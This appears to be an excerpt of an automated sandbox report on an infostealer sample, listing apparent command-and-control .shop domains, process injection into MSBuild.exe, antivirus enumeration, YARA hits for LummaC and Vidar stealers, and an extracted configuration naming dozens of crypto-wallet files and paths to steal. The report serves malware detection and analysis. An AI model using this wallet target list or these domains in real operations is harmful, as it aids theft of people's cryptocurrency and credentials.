Source: DGDBKFBAKF.exe, 00000007.00000002.2157026273.00000000052C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: liernessfornicsa.shop
Source: DGDBKFBAKF.exe, 00000007.00000002.2157026273.00000000052C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: upknittsoappz.shop
Source: DGDBKFBAKF.exe, 00000007.00000002.2157026273.00000000052C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: shepherdlyopzc.shop
Source: DGDBKFBAKF.exe, 00000007.00000002.2157026273.00000000052C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: unseaffarignsk.shop

Searches for specific processes (likely to inject)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_00411400 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,FindCloseChangeNotification,	1_2_00411400
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_004112F0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,	1_2_004112F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_0040F8A5 _EH_prolog,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,	6_2_0040F8A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_0040F7CA _EH_prolog,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,	6_2_0040F7CA

Writes to foreign memory regions

Source: C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 420000	Jump to behavior
Source: C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 428000	Jump to behavior
Source: C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 63D000	Jump to behavior
Source: C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 63E000	Jump to behavior
Source: C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: B87008	Jump to behavior
Source: C:\ProgramData\DBAAFIDGDA.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000	Jump to behavior
Source: C:\ProgramData\DBAAFIDGDA.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000	Jump to behavior
Source: C:\ProgramData\DBAAFIDGDA.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 41D000	Jump to behavior
Source: C:\ProgramData\DBAAFIDGDA.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 425000	Jump to behavior
Source: C:\ProgramData\DBAAFIDGDA.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 63A000	Jump to behavior
Source: C:\ProgramData\DBAAFIDGDA.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 63B000	Jump to behavior
Source: C:\ProgramData\DBAAFIDGDA.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BF3008	Jump to behavior
Source: C:\ProgramData\DGDBKFBAKF.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000	Jump to behavior
Source: C:\ProgramData\DGDBKFBAKF.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000	Jump to behavior
Source: C:\ProgramData\DGDBKFBAKF.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 43D000	Jump to behavior
Source: C:\ProgramData\DGDBKFBAKF.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 440000	Jump to behavior
Source: C:\ProgramData\DGDBKFBAKF.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 450000	Jump to behavior
Source: C:\ProgramData\DGDBKFBAKF.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 8AD008	Jump to behavior

Source: C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\ProgramData\DBAAFIDGDA.exe "C:\ProgramData\DBAAFIDGDA.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\ProgramData\DGDBKFBAKF.exe "C:\ProgramData\DGDBKFBAKF.exe"	Jump to behavior
Source: C:\ProgramData\DBAAFIDGDA.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\ProgramData\DGDBKFBAKF.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 1_2_6C794760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free,

1_2_6C794760

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 1_2_00401000 cpuid

1_2_00401000

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,		1_2_0040FC30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,		6_2_0040E455

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior

Source: C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe	Queries volume information: C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\ProgramData\DBAAFIDGDA.exe	Queries volume information: C:\ProgramData\DBAAFIDGDA.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\DBAAFIDGDA.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\ProgramData\DGDBKFBAKF.exe	Queries volume information: C:\ProgramData\DGDBKFBAKF.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\DGDBKFBAKF.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 1_2_0041A440 GetLocalTime,SystemTimeToFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,

1_2_0041A440

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 1_2_0040FAE0 GetProcessHeap,HeapAlloc,GetUserNameA,

1_2_0040FAE0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 1_2_0040FBC0 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,

1_2_0040FBC0

Source: C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2623692581.0000000001100000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2623692581.0000000001077000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Yara detected Vidar

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 5.2.DBAAFIDGDA.exe.4c06f40.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.DBAAFIDGDA.exe.4c06f40.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.DBAAFIDGDA.exe.4165990.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.MSBuild.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.MSBuild.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.MSBuild.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.DBAAFIDGDA.exe.4165990.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.1lKbb2hF7fYToopfpmEvlyRN.exe.49a3090.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.DBAAFIDGDA.exe.41b99f0.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.1lKbb2hF7fYToopfpmEvlyRN.exe.43531c0.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.1lKbb2hF7fYToopfpmEvlyRN.exe.4975860.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.DBAAFIDGDA.exe.41b99f0.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.1lKbb2hF7fYToopfpmEvlyRN.exe.4975860.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.1lKbb2hF7fYToopfpmEvlyRN.exe.43809f0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.MSBuild.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.1lKbb2hF7fYToopfpmEvlyRN.exe.49a3090.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.1lKbb2hF7fYToopfpmEvlyRN.exe.43531c0.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.1lKbb2hF7fYToopfpmEvlyRN.exe.43809f0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.2078508760.000000000418F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2078508760.0000000004161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2078508760.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1669807678.00000000034A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1673284783.0000000004380000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1673284783.0000000004353000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2617277364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2075717329.000000000326D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2078508760.0000000004B1E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2379793431.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1673284783.00000000049A3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1673284783.0000000004866000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 1lKbb2hF7fYToopfpmEvlyRN.exe PID: 7252, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 7280, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: DBAAFIDGDA.exe PID: 7796, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 7828, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: MSBuild.exe	String found in binary or memory: ElectrumLTC
Source: MSBuild.exe, 00000001.00000002.2384093169.0000000000F27000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000001.00000002.2384093169.0000000000F27000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000001.00000002.2384093169.0000000000F27000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: DBAAFIDGDA.exe, 00000005.00000000.2060267748.00000000009A2000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: rjAXxB1AqwMLVddxGLc9
Source: MSBuild.exe, 00000001.00000002.2384093169.0000000000F27000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000001.00000002.2384093169.0000000000F27000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
